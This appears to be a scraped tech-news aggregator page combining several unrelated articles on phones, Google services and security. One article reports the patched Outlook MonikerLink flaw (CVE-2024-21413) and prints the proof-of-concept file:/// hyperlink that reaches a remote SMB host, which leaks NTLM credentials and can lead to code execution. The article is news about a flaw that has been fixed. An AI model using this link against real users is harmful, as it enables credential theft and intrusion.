Android Safe Browsing will protect you from malware & phishing

0
[ad_1]

Google is testing a new security feature for Android OS. Called Android Safe Browsing, it helps protect users from malware and phishing attempts. The feature alerts you to harmful links and websites within supported apps. Once rolled out, you will find all supported apps on a dedicated Settings page.

Android Safe Browsing will enhance your online security with malware alerts

Google offers a wide range of security features for Android devices and apps. Its Chrome browser comes with a built-in Safe Browsing tool that checks for potential security threats when loading a page. The firm recently announced efficiency improvements for the feature. It introduced a new mechanism that allows sites to load even while real-time safety checks are in progress, reducing the latency in page load.

It appears Google is simultaneously testing Android Safe Browsing. Noted Android expert Mishaal Rahman was tipped off about the new feature that recently started showing up on some Google Pixel and Samsung Galaxy phones. A screenshot shared by Rahman reveals that the tool will alert users to security threats like harmful links and webpages when browsing within supported apps.

“You might get an alert if you tap a link in your news app that would take you to a known phishing site,” Google explains. The feature has a dedicated Settings page where it lists all the supported apps. There is also a toggle to enable “live threat protection” for “more accurate threat detection.” This page is available under Settings > Security & privacy > More security & privacy on Pixel devices and Settings > Security & Privacy on Galaxy devices.

Android Safe Browsing screenshot

According to Rahman, Android Safe Browsing “likely lists which apps utilize the SafetyNet Safe Browsing API.” Part of Google Play Services, this library “lets apps determine whether a particular URL has been marked as a known threat by Google.” The company might share more details once it is ready to roll out the feature to everyone. Currently, it appears to be testing the tool among a small group of users.

A serve-side update should bring the feature to all Android devices

While Android Safe Browsing may be limited to Pixel and Galaxy devices during the testing phase, it should eventually roll out to all Android devices with GMS (Google Mobile Services). Google may enable the feature through a server-side update via Google Play Services. You can check for it under the Security & Privacy Settings menu on your Android device.


[ad_2]
Source link

Is Google bundling Google One and Nest Aware? Global price hike for Nest Aware on the horizon

0
[ad_1]

Google’s Nest Aware subscription for Nest cameras, offering access to video recording history, smart alerts, and additional features, appears to be integrating into the Google One service.

In version 3.13 of the Google Home app, 9to5Google discovered strings that hint at a potential combined Nest Aware/Google One offering. These findings come after the introduction of Google One AI Premium, providing access to Gemini Advanced (the tech giant’s most capable AI model).

 
“Video history and intelligent alerts” are highlighted as the primary benefits. The interpretation of the discovered strings suggests that Google One subscribers may receive the base Nest Aware plan, priced at $8 per month or $80 annually, offering 30 days of event-based video history.


Nest Aware Plus, providing 60 days of event history and up to 10 days of 24/7 video history, could potentially be offered as an “addon.” The current standalone cost for Nest Aware Plus is $15 per month or $150 annually.


The specific Google One plan that will include this perk is yet to be determined. It seems that AI Premium, priced at $19.99 and above, would be the most suitable option. The integration of Nest Aware could potentially enhance the value of the AI Premium plan. The $9.99 Premium plan with 2 TB might be considered too low in price for the addition of Nest Aware unless a price increase is on the horizon.

 
In Canada, Nest Aware Plus is rising from CA$16 to CA$20 per month and now carries an annual cost of CA$200, while the base plan is set at CA$10 per month or $100 annually. This adjustment will take effect on the next Nest Aware bill occurring on or after March 25, 2024.


[ad_2]
Source link

HONOR Magic6 RSR is the upcoming Porsche Design phone, as expected

0
[ad_1]

HONOR confirmed yesterday that a new Porsche Design smartphone is coming. That phone was said to accompany the Porsche Design HONOR Magic V2 RSR, the company’s premium foldable offering. We assumed that the Porsche Design HONOR Magic6 RSR is the upcoming device, and that was kind of confirmed.

The HONOR Magic6 RSR is the upcoming Porsche Design smartphone

HONOR still didn’t officially confirm it, but the device did get certified, as revealed by Huawei Central. It appeared on the MIIT certification in China. The certification reveals the Magic6 RSR device with a model number BAL-AN20.

HONOR Magic6 RSR MIIT certification

In China, the phone will support satellite connectivity and dual-SIM 5G connectivity as well. That’s what this certification reveals and nothing more, basically. The HONOR Magic6 RSR will basically be the HONOR Magic6 Pro with a different look on the back. That will almost certainly be the case. The same was the case with the Porsche Design HONOR Magic V2 RSR.

The design of the phone did surface in the past, as you can see in the image below. From the front, it looks basically the same as the HONOR Magic6 Pro. From the back, not so much. It has a different-looking camera island, and a different backplate too.

HONOR Magic6 Porsche Design possible design 1

HONOR will likely use vegan leather on the back, and change up the back-facing design

Vegan leather seems to have been used here, as on some other HONOR Magic6 Pro models, but the shape is different. There’s a vertical protrusion in the middle of the phone’s backplate, which makes for an interesting look, and will probably help with grip too.

In regards to the camera island, it has an entirely different shape, not to mention it’s curved on the sides. We’re still not sure this design is the real deal, but it’s possible it is, we’ll have to wait and see.

The HONOR Magic6 Pro has already launched in China, while its global variant will drop at MWC 2024 later this month. It’s expected to be basically the same phone as in China, but without some China-focused features, and with global software.


[ad_2]
Source link

YouTube TV starts rolling out Last Channel Shortcut to all subscribers

0
[ad_1]

YouTube TV has been testing a new feature called “Last Channel Shortcut,” which allows users to switch between channels with ease, for a few months now. The feature was gradually rolled out to various platforms like mobile and Roku devices.

Today, the streaming service announced that Last Channel Shortcut is rolling out to everyone. To take advantage of the new functionality, you’ll need to long-press the Select/OK button on the remote to switch to a channel/video that you were previously watching. Here is a step-by-step guide posted by YouTube TV on reddit:

  • Open the YouTube TV app on your TV
  • Play any video
  • Choose and play another video
  • Long-press (press-and-hold) the OK/Select button on your remote while watching the second video
  • You’ll be taken back to the last channel or video that you were watching

It’s important to mention that the new Last Channel Shortcut feature should work across all content types, including Live, DVR, and VOD. If you’re subscribed to YouTube TV, you should be seeing the new feature already. Hopefully, this won’t be temporarily removed like the “1080p enhanced” feature, which is no longer available after issues have been found.

[ad_2]
Source link

Google announces changes to Docs, Sheets and Slides comments sections

0
[ad_1]

Google plans to implement important changes to comments sections of Docs, Sheets and Slides, the Mountain View company announced this week. This is an attempt to offer users an improved comments experience in these apps, so here are the main key features that are coming next month.

Firstly, Google is adding new ways to interact with comments that can be selected by going to View / Comments. For example, users will be able to click the new “Show all comments” option to open a full-length view to peruse through multiple comments more easily.

Also, the updated search and filter functionality will make it easier to find what you’re looking for. A curated “For you” list will also be added, which brings up all the comments that require action.

Another helpful new feature coming to Docs and Slides in just a few weeks is the option to expand comments. Basically, users will be able to see comments next to the document or presentation content, thus making it easier to review them alongside the content they’re working on.

Furthermore, Google Docs and Sheets users will be getting the ability to minimize comments. This specific feature will reduce comments to icons allowing for a more focused view of the content in these apps. It’s also important to add that this setting will offer users a quick preview with a bunch of info about who is commenting.

Last but not least, the option to hide comments is one of the most important features coming next month to all three Google apps: Docs, Sheets, and Slides.

The new features announced this week will be available to all Google Workspace customers, Google Workspace Individual subscribers, as well as users with personal Google accounts. The roll-out is expected to start on March 1 and should take about three days.


[ad_2]
Source link

New Outlook 0-day RCE Flaw Exploited in the Wild

0
[ad_1]

Outlook has been discovered to have an interesting vulnerability while handling specific hyperlinks, which was found to be exploited by threat actors in the wild. This vulnerability has been assigned with CVE-2024-21413, and the severity was given as 9.8 (Critical).

However, Microsoft has addressed this vulnerability and fixed it as part of their Patch Tuesday release of February 2024. Successful exploitation of this vulnerability could allow a threat actor to bypass the Office-protected view and open a file in editing mode instead of the “protected mode.”

Document
Live Account Takeover Attack Simulation

Live attack simulation Webinar demonstrates various ways in which account takeover can happen and practices to protect your websites and APIs against ATO attacks.

Outlook 0-day RCE Flaw

According to the Checkpoint report, if the hyperlink starts with http:// or https://, Outlook uses Windows’s default browser to open the URL. However, if there are any other protocols like the “Skype” URL protocol, clicking on the hyperlink will display a security warning.

Microsoft Warning Notice (Source: Checkpoint)
Microsoft Warning Notice (Source: Checkpoint)

In other cases, like the “file://” protocol, Outlook did not display a warning dialog box. Instead, it had an error message in the Windows Notification Center, and the resource that was tried to access through the link was also not accessed.

If the file was accessed, there is a high chance that the local NTLM credential information could have been leaked.

Windows Notification Center Warning Message (Source: Checkpoint)
Windows Notification Center Warning Message (Source: Checkpoint)

A slight modification in the “file://” protocol link bypasses the previously shown security restriction and proceeds to access the resource. For testing purposes, the below link was used, which successfully accessed the “test.rtf” file on the remote resource.

<a href=”file:///\\10.10.111.111\test\test.rtf!something”>CLICK ME</a>

As stated by researchers, accessing this resource uses the SMB protocol that leaks the local NTLM credential information during the process. Moreover, researchers also tried escalating this attack vector to arbitrary code execution. 

Moniker Link string uses the “look up” for COM (Component Object Model) objects on Windows. Outlook calls the ole32!MkParseDisplayName() API for doing this job. As per Microsoft’s API document for Moniker, including “!” makes it a composite moniker.

Exploitation

Researchers used this composite moniker with FileMoniker (\\10.10.111.111\test\test.rtf) + ItemMoniker (something) for accessing Microsoft Word. Windows runs Microsoft Word as a COM server in the background.

If the hyperlink is clicked, Word opens and parses the file “test.rtf” based on the string “\\10.10.111.111\test\test.rtf”. However, this test.rtf is controlled by the attacker, which was further modified to perform arbitrary code execution on the remote system using “WINWORD.EXE”.

Researchers stated this #MonikerLink bug/attack vector may be present in other software and also recommend developers check and fix the issue.

Stay updated on Cybersecurity news, Whitepapers, and Infographics. Follow us on LinkedIn & Twitter.


[ad_2]
Source link

HONOR confirms another Porsche Design phone is coming

0
[ad_1]

HONOR has just confirmed that another Porsche Design smartphone is coming. This info has been shared by HONOR’s Chief Designer and the Head of Design at Porsche Lifestyle Group. Yuan and Carsten Monnerjan revealed as much in a joint interview that will soon be published in the ‘Wallpaper’ magazine. We got some info from HONOR beforehand.

Both designers shared their creative philosophy when it comes to bringing premium products to the market. They focused on the luxury segment of smart devices, of course. The interview also contains details regarding the overall development approach adopted in jointly shaping new products.

HONOR & Porsche Design will deliver yet another phone, soon

The main takeaway from this interview is the announcement of a new collaboration. HONOR and Porsche Design will bring yet another product to global markets, in addition to the Porsche Design HONOR Magic V2 RSR.

If we had to guess, we’d say that they’re talking about the Porsche Design HONOR Magic6 Pro. That is the only other HONOR smartphone that was mentioned in relation to Porsche Design, albeit in rumor/leaks only.

The HONOR Magic6 Pro has already been launched in China, and it will arrive to global markets during the Mobile World Congress (MWC) in Barcelona later this month. That’s also where HONOR and Porsche Design could show us the second product from their collab. Alternatively, it may arrive at a later date, we’ll see.

The HONOR Magic6 Pro is probably the device in question, and it will feature a different design

The Porsche Design variant of the HONOR Magic6 Pro will likely have identical internals to the regular model, but a different shell. We’re expecting a nice-looking back side, as the one the Porsche Design HONOR Magic V2 RSR delivered.

HONOR will focus on the HONOR Magic6 Pro and Porsche Design HONOR Magic V2 RSR in Barcelona, though. Those are the two newest and hottest products the company has to offer. The company’s press event will take place on February 25 at 2 PM CET (Barcelona time).


[ad_2]
Source link

Leak reveals official cases for Samsung’s Galaxy A35 & A55

0
[ad_1]

As anticipation builds for Samsung’s Galaxy A35 and Galaxy A55, the frequency of leaks continues to go up. Days after the duo showed up in a new set of renders revealing four color variants, we have images of their official accessories. The company has readied a bunch of protective cases for its upcoming mid-range smartphones.

Samsung will offer several official cases for the Galaxy A35 and Galaxy A55

According to a report by Appuals, customers of the Galaxy A35 and Galaxy A55 will be able to pick from five different case designs, at least when buying official cases—there will be numerous third-party options. Samsung will offer its popular Smart View Wallet Case for both models in Black, White, and Purple colors.

This case comes with a front cover featuring a tiny window to quickly check out AOD and perform basic functions like answering the phone and controlling music playback. On the underside of the front cover is a card holder, so the case doubles up as your wallet. It is also available for flagship devices such as the Galaxy S24 series.

Next up, Samsung has readied a silicone cover for the Galaxy A55 and Galaxy A35 in Black, Lime, and Blue colors. It is a standard silicone case that protects the frame and the rear panel of the device. The former model will also get a Standing Grip Case in Blue and Grey colors. Lastly, there will be a transparent case and a semi-transparent case for the duo.

Additionally, the Korean behemoth will offer a 2-piece Screen Protector bundle for the Galaxy A55 and Galaxy A35. The bundle should come with a complete set of tools to help you apply the protector at home. The publication reports that these official Samsung accessories for the Galaxy A55 and Galaxy A35 will be priced between €10 and €60.

The mid-range duo might debut soon

A few days back, Samsung officially published the repairability scores for the Galaxy A55 and Galaxy A35. It has also put up support pages for the mid-range duo on its website in some markets. All of this indicates a nearing launch of the phones. The company might unveil them in March or April. The former will be a more premium model, featuring a metallic frame and a more powerful processor. It might also get better cameras, though there are rumors about a camera upgrade for the latter. Stay tuned for the official launch.


[ad_2]
Source link

Prescriptive Mitigation Guidance, Power to ICS Security

0
[ad_1]

Imagine a cascading blackout, disrupted pipelines, or manipulated manufacturing processes – all orchestrated through a cyberattack. This chilling reality paints a stark picture of the escalating cyber threats targeting Industrial Control Systems (ICS). 

Addressing these challenges effectively requires specialized expertise. Risk Assessment & Mitigation (RAM2) professional services come in here. One breach can have devastating consequences, impacting profits, public safety, and environmental well-being.

Prescriptive Mitigation Guidance

Prescriptive Mitigation Guidance empowers organizations to move beyond simply identifying vulnerabilities. It starts with thoroughly assessing systems, networks, and processes, meticulously uncovering potential weaknesses. But it doesn’t stop there. It then prioritizes risks based on their severity, likelihood of exploitation, and potential impact. This laser focus ensures that organizations address the most critical threats first. 

The guidance delves deeper with clear priorities, recommending specific mitigation strategies for each vulnerability. This could involve patching software, implementing access controls, configuring security settings, or raising employee awareness. 

Prescriptive Guidance vs Its Descriptive Counterpart

Prescriptive mitigation steps in with a laser focus instead of simply highlighting vulnerabilities. Like descriptive guidance would. It tailors actions directly to the organization’s unique needs and risks, offering more relevant and actionable insights. 

This tailored approach fosters a proactive security culture, urging organizations to actively address vulnerabilities before they become exploitable entry points for cyber threats.

Benefits of Prescriptive Mitigation Guidance

Beyond immediate defense, Prescriptive Mitigation Guidance builds a fortress: reduced attack risks, optimal resource allocation, and maximized security spending. It’s a shield and a budgeter all in one. ️ It also plays a crucial role in regulatory compliance. Its alignment with industry-recognized standards and best practices streamlines the compliance process, saving valuable time and effort.

Furthermore, the clear and actionable steps increased efficiency by streamlining security processes, allowing teams to work more effectively. Prescriptive Mitigation Guidance is a comprehensive shield, offering immediate protection and long-term efficiency and compliance benefits.

Technology environments are prime targets, often reliant on legacy systems and facing unique vulnerabilities. In this critical landscape, Prescriptive Mitigation Guidance emerges as a beacon of hope, offering tangible benefits and bolstering organizational defenses.

  • A Shield for Legacy Technology.
  • Speeding Up the Response.
  • Building Resilience for the Future.

Why Prescriptive Mitigation Guidance is Crucial for OT Security

Generic cybersecurity advice crumbles in the face of OT complexities. Focused on IT, it blindsides OT’s unique tech, exposing vulnerabilities. Vague “patch” recommendations lack specifics for your organization’s OT setup, forcing security teams to decipher generic advice on the fly. 

Generic advice fumbles, Prescriptive Guidance dissects. It deep-dives into OT specifics, tackling vulnerabilities tailored to your organization’s unique setup. No more one-size-fits-all, just laser-focused protection.

With Prescriptive Mitigation Guidance, organizations can move beyond generic advice and gain a powerful tool to shield their unique OT environment from ever-evolving cyber threats. 

6 Necessary Elements of Effective Prescriptive Mitigation in ICS Security

Step-by-Step Clarity: Practical guidance skips the “what’s wrong” and provides a clear “how to fix it” plan, like instructions for building a machine. 

Tailored to Threats and Environments: Generic cybersecurity advice falls flat in the face of diverse OT needs. Practical guidance adapts to each, offering specific solutions for unique vulnerabilities.

Real-Time Agility: Practical guidance acknowledges this fluidity and provides mechanisms for updates and revisions as new threats emerge or vulnerabilities are discovered. It shouldn’t be a static document but a living resource that adapts to the changing battlefield.

Transparency and Rationale: Trust is vital in cybersecurity. Practical guidance doesn’t just dictate actions; it explains the rationale behind each recommendation. This transparency fosters understanding and buy-in from technical teams.

Measurable Outcomes: Effective guidance goes beyond simply outlining actions; it establishes metrics for measuring success. By defining and tracking metrics, organizations can assess the effectiveness of their mitigation efforts and make necessary adjustments.

Integration with Existing Processes: Guidance that exists in a silo is less practical. It should integrate seamlessly with existing security processes and frameworks for seamless implementation. 

Conclusion

The industrial world thrives on innovation, but a growing threat of cyberattacks lies beneath the humming machinery. Operational Technology (OT) environments, often reliant on legacy systems and lacking robust security, become prime targets for attackers seeking disruption. 

In this dangerous landscape, Prescriptive Mitigation Guidance emerges as a critical shield, offering a structured approach to proactively address vulnerabilities and fortify organizational defenses.


[ad_2]
Source link

ASUS Zenfone 11 Ultra gets benchmarked with Snapdragon 8 Gen 3

0
[ad_1]

The ASUS ZenFone 11 Ultra is coming, and the phone just surfaced on a benchmarking tool with the Snapdragon 8 Gen 3 SoC. Geekbench, the benchmarking tool in question, did reveal a couple of additional tidbits about the phone too.

Before we get to it, do note that the phone did surface in images on several occasions thus far. Its specifications have also appeared, so we knew what to expect out of it. It will essentially be a somewhat redesigned ASUS ROG Phone 8.

The ASUS ZenFone 11 Ultra gets benchmarked as we’re waiting for more info about its launch

Having said that, the phone managed to score 2,226 points in the single-core test, and 6,949 points in the multi-core test. The Snapdragon 8 Gen 3 is mentioned in the listing, and the same goes for 16GB of RAM.

ASUS ZenFone 11 Ultra Geekbench

That is pretty much everything that the listing shares with us. This phone does look like the ASUS ROG Phone 8, but it has a slightly different camera island without the ‘ROG’ branding. The same goes for its backplate.

Its specifications did surface about a week and a half ago. A 6.78-inch fullHD+ (2400 x 1080) display was mentioned. That is an LTPO panel with a refresh rate that goes from 1 to 120Hz during regular usage. It can go up to a max of 144Hz for games.

The phone will include a 5,500mAh battery, and support 65W charging

A 5,500mAh battery was also mentioned, and the same goes for 65W wired charging. The phone will also support 15W wireless charging, and include an audio jack. Stereo speakers will also be included, and they’ll be optimized by Dirac.

A 50-megapixel main camera (Sony’s IMX890 sensor) will be included on the back, along with a 13-megapixel ultrawide camera (120-degree FoV). A 32-megapixel telephoto shooter (3x optical zoom) will also be a part of the package. On the front, you’ll be able to find a 32-megapixel camera.

The ASUS ZenFone 11 Ultra will arrive in five colors. Those colors are Eternal Black, Skyline Blue, Misty Gray, Verdure Green, and Desert Sienna. All of them are shown in the featured image.


[ad_2]
Source link